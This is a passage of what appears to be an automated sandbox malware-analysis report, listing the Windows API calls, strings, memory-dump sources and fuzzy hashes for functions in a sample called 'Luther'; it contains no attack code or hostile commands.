Instruction Fuzzy Hash: 6C01F2B228AA067EF66026787CC0F67674DDF423FCB34632DB631B11D1DA718C409160

Function 00E92374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00E92394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E923D7

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8cae224eb7a2b4a1261b1f914140e474c2fe2bf5685c6361c43f80a938e755c0
Instruction ID: 9ab6a495157946c0dc9c7f248244f1ec0bc9176bfc8fa0a582b5692f6912316a
Opcode Fuzzy Hash: 8cae224eb7a2b4a1261b1f914140e474c2fe2bf5685c6361c43f80a938e755c0
Instruction Fuzzy Hash: 4C11273A900219FFEF11DBA5CD85F9DBBB8EB08750F2000A5EA00B7290D6716E10DB94

Function 00E31AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E31AF4
GetClientRect.USER32(?,?), ref: 00E731F9
GetCursorPos.USER32(?), ref: 00E73203
ScreenToClient.USER32(?,?), ref: 00E7320E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: a1c478b6fd0a4c86d38c88597ef80c4f4dadeae7e13ede9d0b8b32145eca2603
Instruction ID: f6da3d7abea6dffbc5d870c07914ab406915fb57368cf47153c36a4a33d8f77f
Opcode Fuzzy Hash: a1c478b6fd0a4c86d38c88597ef80c4f4dadeae7e13ede9d0b8b32145eca2603
Instruction Fuzzy Hash: 0A115831A0101AAFCB009FA4C949DEEBBB8EB44345F404466E902B2140C732AA82EBB1

Function 00E9EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E9EB14
MessageBoxW.USER32(?,?,?,?), ref: 00E9EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E9EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E9EB64

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 8ea02d8504743dc8bd02a6793d01cc9e0f9e4977216698bd7ad06ff66cda193a
Instruction ID: 9e94ce8ec715af83509fd4fced376d9eb54540d1963a6c91741371904e6045aa
Opcode Fuzzy Hash: 8ea02d8504743dc8bd02a6793d01cc9e0f9e4977216698bd7ad06ff66cda193a
Instruction Fuzzy Hash: 9A110472904218BFCB11DBA89C0AE9E7FACBB45324F044266F915F3390E676890987B0

Function 00E5D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00E5D369,00000000,00000004,00000000), ref: 00E5D588
GetLastError.KERNEL32 ref: 00E5D594
__dosmaperr.LIBCMT ref: 00E5D59B
ResumeThread.KERNEL32(00000000), ref: 00E5D5B9

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: ae134f3ed02c8f40e0717080aaf64208aa40411adf71b0095696530ce451b9d0
Instruction ID: ccaa75bd38e9f9fb34c7647fcc5a5f971c8603a080f0f93bd938008d2d759e5e
Opcode Fuzzy Hash: ae134f3ed02c8f40e0717080aaf64208aa40411adf71b0095696530ce451b9d0
Instruction Fuzzy Hash: 0F01D632409214BBDB316FA5DC05FAA7B69EF41737F101629FD25B61E0EB718809C6A1

Function 00E37873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
GetStockObject.GDI32(00000011), ref: 00E378C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 70e775107fbac5c0a8264e260ed7bbeea2a0f1345a72fa68d1de0fc391ff9aba
Instruction ID: 8086e5f7565b7b0b00114c7e236097a8ff9a32b7bc410a122496c2a5653ece7e
Opcode Fuzzy Hash: 70e775107fbac5c0a8264e260ed7bbeea2a0f1345a72fa68d1de0fc391ff9aba
Instruction Fuzzy Hash: 2811A1B2505518BFDF165F90CC58EEABF69FF48398F041126FA0462110D732DC60EBA0

Function 00E633E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue), ref: 00E63418
GetLastError.KERNEL32(?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue,00ED3260,FlsSetValue,00000000,00000364,?,00E631B9), ref: 00E63424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E6338D,00000364,00000000,00000000,00000000,?,00E635FE,00000006,FlsSetValue,00ED3260,FlsSetValue,00000000), ref: 00E63432

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a179bd777fdb7517fe0ea09415f41ed12f2df0dc08e1995162926e754dc98844
Instruction ID: ea88c0db5ef7c0acbfc41e3896a781fac4646c654f657863df643eef5ab59d79
Opcode Fuzzy Hash: a179bd777fdb7517fe0ea09415f41ed12f2df0dc08e1995162926e754dc98844
Instruction Fuzzy Hash: 4A01D8326552229BC7224B7ABC44D56FB58FF14BF57111230F916F3141CB22DD06C6E0

Function 00E9BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E9B69A,?,00008000), ref: 00E9BAED

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 495a7e23154c2cb6bf07adce21d1e694d1c76c531d7f24f631935ed014dcb18b
Instruction ID: 3580445d8789bd6baa168a8c39f75721c4d03d26d4c0fbf3d0a99e0674256e54
Opcode Fuzzy Hash: 495a7e23154c2cb6bf07adce21d1e694d1c76c531d7f24f631935ed014dcb18b
Instruction Fuzzy Hash: 4E117C70C05519EBCF009FE5EA48AEEBB78BF09710F1100A5D541B2140CBB15654CBA1

Function 00EC886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EC888E
ScreenToClient.USER32(?,?), ref: 00EC88A6
ScreenToClient.USER32(?,?), ref: 00EC88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EC88E5

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 258c4db52ac4f9831ab72b825d945d445d2278ab25d000b6a7ef504a5ea5dfd1
Instruction ID: 62e7f093f150f0783d1980feb5f554b9b0d793bb38d0ac5c524d43cfe39039b5
Opcode Fuzzy Hash: 258c4db52ac4f9831ab72b825d945d445d2278ab25d000b6a7ef504a5ea5dfd1
Instruction Fuzzy Hash: AD1160B9D00209AFDB01CFA9C984AEEFBB5FB08314F508166E915E2210D736AA55CF50

Function 00E936F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E93712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93723
GetCurrentThreadId.KERNEL32 ref: 00E9372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E93731

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 1bd9ccef1bffa7b12f24f564956cc0a500cbb65e153ebbe2d1ce2803334d6441
Instruction ID: fcb849aae2ff7e04c3d30ced8330746d61af47247f01ffbdca204be2a25601d6
Opcode Fuzzy Hash: 1bd9ccef1bffa7b12f24f564956cc0a500cbb65e153ebbe2d1ce2803334d6441
Instruction Fuzzy Hash: BAE06DF11052247EDA2017A39C4DEEBBF6CDB42BA1F000036F505F2080DAA28946C2B0

Function 00EC92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E31F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E31F87
Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31F96
Part of subcall function 00E31F2D: BeginPath.GDI32(?), ref: 00E31FAD
Part of subcall function 00E31F2D: SelectObject.GDI32(?,00000000), ref: 00E31FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00EC92E3
LineTo.GDI32(?,?,?), ref: 00EC92F0
EndPath.GDI32(?), ref: 00EC9300
StrokePath.GDI32(?), ref: 00EC930E

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3b73be6cd3c8d78ccea8ae4d04d6e9d015ab1f2d01be6553e9b81d69c848ba39
Instruction ID: 697187ecfa75c1c5a0743b80c014444624d1fe41a13248274cd94f1eb9eb0d35
Opcode Fuzzy Hash: 3b73be6cd3c8d78ccea8ae4d04d6e9d015ab1f2d01be6553e9b81d69c848ba39
Instruction Fuzzy Hash: 4EF05E32009258BADB125F59AD0EFCE3F5AAF0A324F049015FA11310E2C7779527EBA5

Function 00E321A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E321BC
SetTextColor.GDI32(?,?), ref: 00E321C6
SetBkMode.GDI32(?,00000001), ref: 00E321D9
GetStockObject.GDI32(00000005), ref: 00E321E1

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 6017c7ade721ba09d5c95d717e2f725f94a550f5cabb450ec1cce2d167de7ae7
Instruction ID: d8bdc85eda09cc488fef0e21cc2c64c0c4f91afa44c6986c885f2ea8fe471ffe
Opcode Fuzzy Hash: 6017c7ade721ba09d5c95d717e2f725f94a550f5cabb450ec1cce2d167de7ae7
Instruction Fuzzy Hash: 1CE06531245240AEDB215B75BC09BE87B11AB11335F08C339F7F9740E0C7738645AB11

Function 00E8EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E8EC36
GetDC.USER32(00000000), ref: 00E8EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8EC60
ReleaseDC.USER32(?), ref: 00E8EC81

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e26b36e42b7e12634cd550fa5a96fa1e74476e463e2a652e77bb19dd8b106b96
Instruction ID: b710fc1e23f82c57d27e0f74d31048bc4fda7328e17be38c9f961ca5f73d9ec0
Opcode Fuzzy Hash: e26b36e42b7e12634cd550fa5a96fa1e74476e463e2a652e77bb19dd8b106b96
Instruction Fuzzy Hash: A5E0E5B0804204EFCB41AFA19D09E9DBBB1BB08310F108469E85AF3350C73A5906DF00

Function 00E8EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E8EC4A
GetDC.USER32(00000000), ref: 00E8EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8EC60
ReleaseDC.USER32(?), ref: 00E8EC81

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 16a02a060d5d3e1c089949769eb672c4e0622b293132832e2c20fc080bef8608
Instruction ID: 2d79014dd71ab20576583475c5f14e424daede66bbb0846f4574973b65b3b505
Opcode Fuzzy Hash: 16a02a060d5d3e1c089949769eb672c4e0622b293132832e2c20fc080bef8608
Instruction Fuzzy Hash: 0CE012B0C08204EFCB419FA1DC09A9DBBB1BB08310F108479E85AF3390CB3A6906DF00

Function 00E83616 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON

Download Yara Rule

Strings

@COM_EVENTOBJ, xrefs: 00E83AD6
bn, xrefs: 00E83631, 00E838EA, 00E83903, 00E83B3F, 00E83B58

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LoadString
String ID: @COM_EVENTOBJ$bn
API String ID: 2948472770-192135924
Opcode ID: b8187245206061def3ac5b47625689c08ed6609a9a5eec5dcae926d1ac2f14d8
Instruction ID: 7290fcdae83960a5305dda887c5370dc22ed6bf1a1fef609ce424f6b60b6847d
Opcode Fuzzy Hash: b8187245206061def3ac5b47625689c08ed6609a9a5eec5dcae926d1ac2f14d8
Instruction Fuzzy Hash: 07F171706087009FD718EF24C841B6AB7E1BF84B08F14995DF58EB7291D775EA45CB82

Function 00EB85DB Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00E505B2: EnterCriticalSection.KERNEL32(00F0170C,?,00000000,?,00E3D22A,00F03570,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?), ref: 00E505BD
Part of subcall function 00E505B2: LeaveCriticalSection.KERNEL32(00F0170C,?,00E3D22A,00F03570,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?,00000001,00F02430), ref: 00E505FA

Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333

Part of subcall function 00E50413: __onexit.LIBCMT ref: 00E50419

__Init_thread_footer.LIBCMT ref: 00EB8658

Part of subcall function 00E50568: EnterCriticalSection.KERNEL32(00F0170C,00000000,?,00E3D258,00F03570,00E727C9,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?), ref: 00E50572
Part of subcall function 00E50568: LeaveCriticalSection.KERNEL32(00F0170C,?,00E3D258,00F03570,00E727C9,00000001,00000000,?,?,00EAF023,?,?,00000000,00000001,?,00000001), ref: 00E505A5

Strings

Variable must be of type 'Object'., xrefs: 00EB8697
bn, xrefs: 00EB85E5, 00EB887F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: Variable must be of type 'Object'.$bn
API String ID: 535116098-2837176596
Opcode ID: 646555c0eb6e485d60e4a6edf97fb99e9c428dc5425435caee2daf143f66de58
Instruction ID: b295070ead0f8ba79434c561d71deb0caf3f9c226abf4da92da041e9c7cfa07b
Opcode Fuzzy Hash: 646555c0eb6e485d60e4a6edf97fb99e9c428dc5425435caee2daf143f66de58
Instruction Fuzzy Hash: 88915D74A00208AFCB04EF54DA91DEEBBB9BF44304F509059F946BB392DB71AE45DB50

Function 00EA57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E341EA: _wcslen.LIBCMT ref: 00E341EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00EA5919

Strings

LPT, xrefs: 00EA5840
*, xrefs: 00EA5855

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: e7f161045ff513125421d9e676917b0bcb5bcfe057053c565dbdaa3bf0789786
Instruction ID: 879ca91cb5cd400360dd8a2d6dfa83744f55276cbb3f0b3560880d87565d4930
Opcode Fuzzy Hash: e7f161045ff513125421d9e676917b0bcb5bcfe057053c565dbdaa3bf0789786
Instruction Fuzzy Hash: AF917F76A00604DFCB14DF54C484EAABBF1AF49318F199099E85A6F362C735FE85CB90

Function 00E5E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00E5E67D

Strings

pow, xrefs: 00E5E655, 00E5E672

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 3545b7a24b78d98e00e04038369007b4dceb54c13cf66aea7b84c76c7e6d74b3
Instruction ID: a2183823da37d5626fa6d90080ced1e04b266a6f0a7b3cffab094c5190df9cb6
Opcode Fuzzy Hash: 3545b7a24b78d98e00e04038369007b4dceb54c13cf66aea7b84c76c7e6d74b3
Instruction Fuzzy Hash: F551AD60E4A1028AC7197714EE013AA2BE0EB117C5F207F59F891713E9DF718E8D9A43

